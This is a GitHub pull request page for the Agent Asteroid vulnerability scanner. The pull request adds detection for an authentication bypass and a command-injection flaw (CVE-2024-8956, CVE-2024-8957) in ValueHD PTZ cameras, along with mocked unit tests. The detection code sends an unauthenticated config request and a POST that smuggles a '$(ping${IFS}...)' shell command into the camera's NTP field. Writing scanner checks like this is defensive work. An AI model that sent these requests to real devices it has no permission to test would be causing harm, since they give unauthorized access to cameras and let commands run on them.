Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add detection for CVE-2024-8956 and CVE-2024-8957 #131

Closed
wants to merge 6 commits into from
Closed
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 1 addition & 1 deletion agent/definitions.py
Original file line number Diff line number Diff line change
Expand Up @@ -53,7 +53,7 @@ class VulnerabilityMetadata:

title: str
description: str
reference: str
reference: str | list[str]
nmasdoufi-ol marked this conversation as resolved.
Show resolved Hide resolved
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Sorry but this is not clean, we simply need to switch to references of list[str] only and changes all the other code.

risk_rating: str = "CRITICAL"


Expand Down
115 changes: 115 additions & 0 deletions agent/exploits/vhd_ptz_exploit.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,115 @@
"""Agent Asteroid implementation for CVE-2024-8956 and CVE-2024-8957"""

import datetime
import logging
import re

from packaging import version
from requests import exceptions as requests_exceptions

from agent import definitions
from agent import exploits_registry
from agent.exploits import webexploit

VULNERABILITY_TITLE = "ValueHD PTZ Camera Authentication Bypass and Command Injection"
VULNERABILITY_REFERENCE = ["CVE-2024-8956", "CVE-2024-8957"]
VULNERABILITY_DESCRIPTION = (
"ValueHD PTZ cameras below firmware version 6.3.40 contain an authentication bypass "
"vulnerability in the param.cgi endpoint and a command injection vulnerability via "
"NTP server configuration."
)
RISK_RATING = "CRITICAL"
DEFAULT_TIMEOUT = datetime.timedelta(seconds=90)
PATH = "/cgi-bin/param.cgi?get_device_conf"


@exploits_registry.register
class VHDPTZExploit(webexploit.WebExploit):
accept_request = definitions.Request(method="GET", path=PATH)
check_request = definitions.Request(method="GET", path=PATH)
inject_request = definitions.Request(
method="POST",
path="/cgi-bin/param.cgi?post_network_other_conf",
data=b"ntp_addr=$(ping${IFS}-c4${IFS}8.8.8.8)",
)

accept_pattern = [
re.compile(r'versioninfo="SOC v\d+\.\d+\.\d+\s*[-\\s*ARM]?'),
]

version_pattern = re.compile(r'versioninfo="SOC v(\d+\.\d+\.\d+)')

vuln_ranges = [
definitions.VulnRange(
min=None, # No minimum version
max=version.Version("6.3.39"), # Versions up to 6.3.39 are vulnerable
)
]

metadata = definitions.VulnerabilityMetadata(
title=VULNERABILITY_TITLE,
description=VULNERABILITY_DESCRIPTION,
reference=VULNERABILITY_REFERENCE,
risk_rating=RISK_RATING,
)

def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
"""Rule to detect specific vulnerabilities on a target."""

vulnerabilities: list[definitions.Vulnerability] = []
vulnerabilities.extend(self._detect_auth_bypass(target))
vulnerabilities.extend(self._detect_command_injection(target))

return vulnerabilities

def _detect_auth_bypass(
self, target: definitions.Target
) -> list[definitions.Vulnerability]:
"""Detect the authentication bypass vulnerability."""
vulnerabilities: list[definitions.Vulnerability] = []

target_endpoint = self.accept_request.path
try:
resp = self.session.get(
f"{target.origin}{target_endpoint}", timeout=DEFAULT_TIMEOUT.seconds
)
if self._is_vulnerable_version(resp.text) is True:
vulnerabilities.append(self._create_vulnerability(target))
except requests_exceptions.RequestException as e:
logging.error("Auth bypass detection failed: %s", e)

return vulnerabilities

def _detect_command_injection(
self, target: definitions.Target
) -> list[definitions.Vulnerability]:
"""Detect the command injection vulnerability."""
vulnerabilities: list[definitions.Vulnerability] = []

target_endpoint = self.inject_request.path
try:
resp = self.session.post(
f"{target.origin}{target_endpoint}",
data=self.inject_request.data,
timeout=DEFAULT_TIMEOUT.seconds,
)
if resp.status_code == 200 and "Success" in resp.text:
nmasdoufi-ol marked this conversation as resolved.
Show resolved Hide resolved
nmasdoufi-ol marked this conversation as resolved.
Show resolved Hide resolved
vulnerabilities.append(self._create_vulnerability(target))
except requests_exceptions.RequestException as e:
logging.error("Command injection detection failed: %s", e)

return vulnerabilities

def _is_vulnerable_version(self, response_text: str) -> bool:
"""Check if the target is running a vulnerable version."""
if (matched := self.version_pattern.findall(response_text)) is not None:
for extracted_version in matched:
logging.info("Extracted version: %s", extracted_version)
for r in self.vuln_ranges:
if (
r.min is None or r.min <= version.Version(extracted_version)
) and (
r.max is None or r.max >= version.Version(extracted_version)
):
return True
return False
14 changes: 11 additions & 3 deletions agent/exploits/webexploit.py
Original file line number Diff line number Diff line change
Expand Up @@ -114,14 +114,22 @@ def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
def _create_vulnerability(
self, target: definitions.Target
) -> definitions.Vulnerability:
if isinstance(self.metadata.reference, list):
references = {
f"nvd.nist.gov/{cve}": f"https://nvd.nist.gov/vuln/detail/{cve}"
for cve in self.metadata.reference
}
else:
references = {
f"nvd.nist.gov/{self.metadata.reference}": f"https://nvd.nist.gov/vuln/detail/{self.metadata.reference}"
}

entry = kb.Entry(
title=self.metadata.title,
risk_rating=self.metadata.risk_rating,
short_description=self.metadata.description,
description=self.metadata.description,
references={
"nvd.nist.gov": f"https://nvd.nist.gov/vuln/detail/{self.metadata.reference}",
},
references=references,
recommendation=(
"- Make sure to install the latest security patches from software vendor \n"
"- Update to the latest software version"
Expand Down
137 changes: 137 additions & 0 deletions tests/exploits/vhd_ptz_exploit_test.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,137 @@
"""Unit tests for Agent Asteroid: VHD PTZ Camera Vulnerabilities"""

import requests_mock as req_mock
from requests import exceptions as requests_exceptions

from agent import definitions
from agent.exploits import vhd_ptz_exploit


def testVHDPTZ_whenVulnerable_reportFinding(
requests_mock: req_mock.mocker.Mocker,
) -> None:
"""Test case: when target is vulnerable (firmware 6.3.32)."""
requests_mock.get(
"http://localhost:80/cgi-bin/param.cgi?get_device_conf",
text='devname="ptzoptics" devtype="VX630A" versioninfo="SOC v6.3.32 - ARM 6.3.51THI" serial_num="r1j04260027" device_model="F53.HI"',
status_code=200,
)
requests_mock.post(
"http://localhost:80/cgi-bin/param.cgi?post_network_other_conf",
text='{"Response":{"Result":"Success"}}"',
status_code=200,
)

exploit_instance = vhd_ptz_exploit.VHDPTZExploit()
target = definitions.Target("http", "localhost", 80)

accept = exploit_instance.accept(target)
vulnerabilities = exploit_instance.check(target)

assert accept is True
assert len(vulnerabilities) > 0
vulnerability = vulnerabilities[0]
assert (
vulnerability.entry.title
== "ValueHD PTZ Camera Authentication Bypass and Command Injection"
)


def testVHDPTZ_whenSafe_reportNothing(
requests_mock: req_mock.mocker.Mocker,
) -> None:
"""Test case: when target is safe (firmware 6.3.40)."""
requests_mock.get(
"http://localhost:80/cgi-bin/param.cgi?get_device_conf",
text='devname="ptzoptics" devtype="VX630A" versioninfo="SOC v6.3.40 - ARM 6.3.51THI" serial_num="r1j04260027" device_model="F53.HI"',
status_code=200,
)
requests_mock.post(
"http://localhost:80/cgi-bin/param.cgi?post_network_other_conf",
text="Couldn't connect to server\"",
status_code=200,
)

exploit_instance = vhd_ptz_exploit.VHDPTZExploit()
target = definitions.Target("http", "localhost", 80)

accept = exploit_instance.accept(target)
vulnerabilities = exploit_instance.check(target)

assert accept is True
assert len(vulnerabilities) == 0


def testVHDPTZ_whenAuthRequired_reportNothing(
requests_mock: req_mock.mocker.Mocker,
) -> None:
"""Test case: when authentication is required (not vulnerable)."""
requests_mock.get(
"http://localhost:80/cgi-bin/param.cgi?get_device_conf",
status_code=401,
)
exploit_instance = vhd_ptz_exploit.VHDPTZExploit()
target = definitions.Target("http", "localhost", 80)

accept = exploit_instance.accept(target)

assert accept is False


def testVHDPTZ_whenOlderVersion_reportFinding(
requests_mock: req_mock.mocker.Mocker,
) -> None:
"""Test case: when target has much older version (2.0.39)."""
requests_mock.get(
"http://localhost:80/cgi-bin/param.cgi?get_device_conf",
text='devname="ptzoptics" devtype="VX630A" versioninfo="SOC v2.0.39 - ARM 6.0.30SHIS" serial_num="r1j04260027" device_model="F53.HI"',
status_code=200,
)
requests_mock.post(
"http://localhost:80/cgi-bin/param.cgi?post_network_other_conf",
text='{"Response":{"Result":"Success"}}"',
status_code=200,
)

exploit_instance = vhd_ptz_exploit.VHDPTZExploit()
target = definitions.Target("http", "localhost", 80)

accept = exploit_instance.accept(target)
vulnerabilities = exploit_instance.check(target)

assert accept is True
assert len(vulnerabilities) > 0


def testVHDPTZ_authBypassRequestException_handlingErrorLogged(
requests_mock: req_mock.mocker.Mocker,
) -> None:
"""Test case: handle RequestException in auth bypass detection."""
requests_mock.get(
"http://localhost:80/cgi-bin/param.cgi?get_device_conf",
exc=requests_exceptions.RequestException("Simulated connection error"),
)

exploit_instance = vhd_ptz_exploit.VHDPTZExploit()
target = definitions.Target("http", "localhost", 80)

vulnerabilities = exploit_instance._detect_auth_bypass(target)

assert len(vulnerabilities) == 0


def testVHDPTZ_commandInjectionRequestException_handlingErrorLogged(
requests_mock: req_mock.mocker.Mocker,
) -> None:
"""Test case: handle RequestException in command injection detection."""
requests_mock.post(
"http://localhost:80/cgi-bin/param.cgi?post_network_other_conf",
exc=requests_exceptions.RequestException("Simulated connection error"),
)

exploit_instance = vhd_ptz_exploit.VHDPTZExploit()
target = definitions.Target("http", "localhost", 80)

vulnerabilities = exploit_instance._detect_command_injection(target)

assert len(vulnerabilities) == 0
Loading